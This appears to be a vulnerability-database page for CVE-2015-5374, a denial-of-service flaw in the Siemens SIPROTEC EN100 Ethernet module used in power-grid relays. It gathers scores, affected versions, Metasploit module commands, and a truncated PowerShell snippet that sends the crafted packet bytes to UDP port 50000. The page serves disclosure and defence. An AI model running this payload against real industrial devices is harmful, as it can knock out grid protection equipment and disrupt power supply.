CVE-2015-5374

Published: 18/07/2015 Updated: 23/03/2018
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 826
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

Vulnerability Summary

A vulnerability has been identified in Firmware variant PROFINET IO for EN100 Ethernet module: All versions < V1.04.01; Firmware variant Modbus TCP for EN100 Ethernet module: All versions < V1.11.00; Firmware variant DNP3 TCP for EN100 Ethernet module: All versions < V1.03; Firmware variant IEC 104 for EN100 Ethernet module: All versions < V1.21; EN100 Ethernet module included in SIPROTEC Merging Unit 6MU80: All versions < 1.02.02. Specially crafted packets sent to port 50000/UDP could cause a denial-of-service of the affected device. A manual reboot may be required to recover the service of the device.

Vulnerable Product

siemens siprotec_firmware 4.24

Exploits

# Exploit Title: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
# Date: 14022018
# Exploit Author: M Can Kurnaz
# Contact: twitter.com/0x43414e
# Vendor Homepage: www.siemens.com
# Version: All devices that include the EN100 Ethernet module version V4.24 or prior
# Tested on: Siemens ...

Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module versions prior to 4.25 suffer from a denial of service vulnerability ...

This module sends a specially crafted packet to port 50000/UDP causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices. A manual reboot is required to return the device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerab ...

Metasploit Modules

Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service

This module sends a specially crafted packet to port 50000/UDP causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices. A manual reboot is required to return the device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.

msf > use auxiliary/dos/scada/siemens_siprotec4
msf auxiliary(siemens_siprotec4) > show actions
    ...actions...
msf auxiliary(siemens_siprotec4) > set ACTION < action-name >
msf auxiliary(siemens_siprotec4) > show options
    ...show and set options...
msf auxiliary(siemens_siprotec4) > run

Github Repositories

CVE-2015-5374 Denial of Service PoC

CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service. This code sends a specially crafted packet to port 50000/UDP that could cause a denial of service of the affected device. A manual reboot is required to return the device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability can

Intrusion Detection and Prevention System

To test Intrusion Detection/Prevention functionality

CVE-2015-5374 Siemens SIPROTEC Denial-of-Service Vulnerability

[System.Byte[]] $ByteArray=0x11,0x49,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x9e
$UdpClient = New-Object System.Net.Sockets.UdpClient
$UdpClient.Connect("19216812756", 50000)
$UdpClient.Send($ByteArray, $ByteArray

Recent Articles

Move over, Stuxnet: Industroyer malware linked to Kiev blackouts
The Register • John Leyden • 12 Jun 2017

Modular nasty can seize direct control of substation switches and circuit breakers

Security researchers have discovered malware capable of disrupting industrial control processes. Industroyer can cause the same sort of damage as BlackEnergy, a malware strain blamed for attacks on energy firms that caused blackouts in Ukraine in December 2015. The malware may have featured in follow-up attacks last December and can significantly harm electric power systems. It could be refitted to target other types of critical infrastructure, according to security firm ESET. Industroyer is mod...